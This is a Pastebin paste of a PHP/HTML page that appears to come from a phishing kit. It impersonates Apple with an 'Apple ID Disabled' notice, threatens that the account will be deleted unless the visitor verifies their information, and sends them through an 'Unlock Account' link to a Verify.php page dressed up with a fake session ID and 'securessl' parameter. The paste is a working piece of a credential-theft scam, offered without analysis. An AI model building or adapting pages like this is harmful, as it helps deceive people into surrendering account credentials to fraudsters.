ardiansyahiswan

Untitled

Dec 13th, 2017
597
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.46 KB | None | 0 0
  1. <?php
  2. require "includes/session_protect.php";
  3. require "includes/functions.php";
  4. require "includes/simplehtmldom.php";
  5. ?>
  6. <!DOCTYPE html>
  7. <html>
  8. <head>
  9. <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
  10. <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport">
  11. <link href="css/Fonts.css" rel="prefetch stylesheet" type="text/css">
  12. <link href="css/Login.css" media="screen" rel="stylesheet" type="text/css">
  13. <title></title>
  14. </head>
  15. <body>
  16. <div class="si-body si-container container-fluid" data-theme="lite" id="content">
  17. <div class="widget-container fade-in restrict-max-wh fade-in" data-mode="embed">
  18. <div class="dialog fade-in">
  19. <div class="app-dialog">
  20. <div class="head">
  21. <div class="title" title-align="center">
  22. <br><br>
  23. <img src="img/wew.png" width="75px">
  24. <h2>Apple ID Disabled</h2>
  25. <font size="3"><div class="thin">Your Apple ID has been disabled for security reasons. To enable your account, verify your information , or not your account will be automatically deleted from the system</div></font>
  26. </div>
  27. </div>
  28. <div class="body" body-align="center">
  29. <div class="acc-locked" id="acc-locked">
  30. <div class="dialog-body">
  31. <div class="dialog-info">
  32. <a class="Unclock" target="_top" href="../Verify.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true">Unlock Account</a>
  33. </div>
  34. </div>
  35. </div>
  36. </div>
  37. </div>
  38. </div>
  39. </div>
  40. </div>
  41. </body>
  42. </html>
Advertisement
Add Comment
Please, Sign In to add comment